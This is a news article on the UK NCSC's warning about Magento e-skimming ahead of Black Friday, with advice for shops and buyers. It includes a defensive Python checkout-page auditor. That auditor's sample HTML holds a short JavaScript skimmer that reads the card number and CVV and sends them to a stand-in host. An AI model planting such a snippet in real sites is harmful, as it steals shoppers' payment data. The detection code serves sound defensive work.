The UK’s National Cyber Security Centre (NCSC) today warned businesses with online stores that they risk becoming “cyber traps” for hackers ahead of this year’s Black Friday and Cyber Monday rushes.
The organisation, which is part of the UK government, says it has found thousands of sites vulnerable to an attack known as “e-skimming”: the insertion of malicious code into a website’s payment pages to harvest customers’ card details.
Attackers target these sites by exploiting a vulnerability in Magento, a widely used e-commerce platform that runs the storefront and checkout, rather than a flaw in any individual shop’s own code.
NCSC findings: cause for concern in UK and US
The NCSC found 4,151 online stores that had been compromised by the end of September, with sensitive customer payment data stolen in the process.
The vast majority of these websites were compromised through a vulnerability in Magento – a popular e-commerce platform used by thousands of small business websites on both sides of the Atlantic – that lets attackers carry out e-skimming.
Magento is the e-commerce platform of choice for many large US-based companies, such as Nike, Canon, and Burger King. This is also not Magento’s first run-in with attackers: just last year, the FBI warned companies using the platform about a three-year-old plug-in vulnerability that was being used to steal buyer credentials.
This week’s news, however, is of particular concern given its proximity to Black Friday and Cyber Monday. Both dates see an influx of UK and US users turning to the web to take advantage of the offers.
“We want small and medium online retailers to know how to prevent their sites from being exploited by opportunistic cybercriminals during peak shopping times. Being a victim of cybercrime could leave you and your customers out of pocket and damage your reputation.” – Sarah Lyons, deputy director for economy and society at the NCSC.
What is e-skimming?
Electronic skimming is a process in which attackers gain access to the payment pages of an online store through some kind of vulnerability and plant code that copies card details as shoppers type them in. In this case the weakness lies in the third-party e-commerce platform, Magento, rather than in the individual websites themselves.
This type of fraud is often referred to as “Magecart”, the umbrella name for the criminal groups, and the injected JavaScript skimmers they use, that intercept payment information at the point of purchase.
The name Magecart is no coincidence: the malicious code was originally written specifically to target companies using Magento, but the term is now used more broadly for all attacks of this kind.
What can I do to protect myself from e-skimming?
If you have an online store …
If you are a business owner with an online store (whether or not it uses Magento), the most important step to take immediately is to make sure the software for the e-commerce platform you use is fully up to date.
“… low-traffic businesses, some small and medium-sized businesses, are always at risk because some of them may not have the resources to invest so much in their cybersecurity.” – Herb Stapleton, section chief, FBI Cyber Division.
In this specific case, that means having the latest security patches applied before Black Friday and Cyber Monday. Regardless of the time of year, however, if you process a high volume of credit or debit card transactions, you need a cybersecurity strategy that goes beyond patching: because e-skimming works by adding code to your checkout page, you should also know exactly which scripts that page is supposed to load, and check regularly that nothing has been added or changed.
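Since e-skimming, as described above, works by planting extra JavaScript in the checkout page, a shop owner can catch it by comparing the page against a known-good baseline. The following is an added example written for this article, not NCSC, Magento or Magecart code. It assumes the owner keeps an allow-list of script hosts and the SHA-256 hashes of the inline scripts the page is supposed to contain; the checkout HTML, the hostnames and the skimmer snippet are all constructed for the demonstration.

```python
"""Audit a checkout page for signs of e-skimming (Magecart-style) script injection.

Added example, not NCSC or Magento code. Assumes the shop owner maintains an
allow-list of script hosts and a baseline of known inline-script hashes.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Any absolute URL inside an inline script: skimmers have to send card data somewhere.
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


class ScriptCollector(HTMLParser):
    """Collects every <script> element: its src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)
            self._current = {"src": a.get("src"), "integrity": a.get("integrity"), "body": ""}

    def handle_data(self, data):
        # HTMLParser may deliver a script body in several chunks; join them.
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def sha256_hex(text):
    return hashlib.sha256(text.strip().encode("utf-8")).hexdigest()


def host_of(url):
    """Hostname of a script URL; relative paths count as first-party ('self')."""
    return urlparse(url).hostname or "self"


def audit_checkout_page(html, allowed_hosts, baseline_inline_hashes):
    """Return a list of (finding_kind, detail) tuples; an empty list means nothing unexpected."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for s in collector.scripts:
        if s["src"]:
            host = host_of(s["src"])
            if host not in allowed_hosts:
                findings.append(("unexpected_script_host", s["src"]))
            elif host != "self" and not s["integrity"]:
                # A third-party script without Subresource Integrity can be swapped at the CDN.
                findings.append(("missing_sri", s["src"]))
            continue
        digest = sha256_hex(s["body"])
        if digest not in baseline_inline_hashes:
            findings.append(("unknown_inline", digest))
        for url in URL_RE.findall(s["body"]):
            if host_of(url) not in allowed_hosts:
                findings.append(("unexpected_exfil_host", host_of(url)))
    return findings


# Constructed sample: hostnames, baseline and the injected skimmer are made up for this example.
ALLOWED_HOSTS = {"self", "cdn.example-payments.com", "js.example-analytics.com"}
KNOWN_INLINE = 'window.shopConfig = {"currency": "GBP"};'
BASELINE_INLINE_HASHES = {sha256_hex(KNOWN_INLINE)}

SAMPLE_CHECKOUT_HTML = """<html><head>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-payments.com/sdk.js" integrity="sha384-0000"></script>
<script src="https://js.example-analytics.com/tag.js"></script>
<script>window.shopConfig = {"currency": "GBP"};</script>
<script>
document.getElementById('checkout-form').addEventListener('submit', function () {
  var d = {n: document.getElementById('cc_number').value, c: document.getElementById('cvv').value};
  new Image().src = 'https://cdn-static-assets.invalid/i.png?d=' + btoa(JSON.stringify(d));
});
</script>
</head><body><form id="checkout-form"></form></body></html>
"""


def run_demo():
    """Audit the constructed page; the placeholder 'sha384-0000' stands in for a real SRI hash."""
    return audit_checkout_page(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS, BASELINE_INLINE_HASHES)


if __name__ == "__main__":
    for kind, detail in run_demo():
        print(f"{kind}: {detail}")
```

Run against the sample, the audit reports the analytics tag loaded without an integrity attribute, one inline script whose hash is not in the baseline, and a URL inside that script pointing at a host that is not on the allow-list. The last two together are the signature of a skimmer: new code on the checkout page that talks to somewhere the shop does not. In practice the script runs on a schedule against the live checkout page and the baseline is refreshed only after a deliberate deployment.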
If you are thinking of creating one …
It should also be said that some attackers now use platform-agnostic skimmer code that works across different e-commerce platforms, and that can be planted not only in the store’s own pages but in third-party widgets and other embedded items, such as analytics scripts supplied by outside vendors.
If you are a buyer …
If you are a buyer, on the other hand, the best thing you can do is pay with a credit card rather than a debit card where possible, given the lower liability for fraud and the fact that getting money refunded to a debit card is not the fastest process.
If you are paying for something online, check recent reviews of the website you want to buy from and enter only the minimum personal information required for the purchase. Having a card dedicated to online transactions that is kept almost empty could also be useful, as could a virtual card.
You should only submit payment information to websites whose URLs begin with https:// (although this does not mean every HTTPS site is safe, a site without it should be treated with extreme caution). Bear in mind that the padlock only tells you the connection is encrypted; it says nothing about whether a skimmer has been injected into the page itself, which is exactly what e-skimming does.
Finally, if you believe you have been the victim of online fraud, immediately report it to your bank and cancel the affected cards to avoid further fraudulent transactions.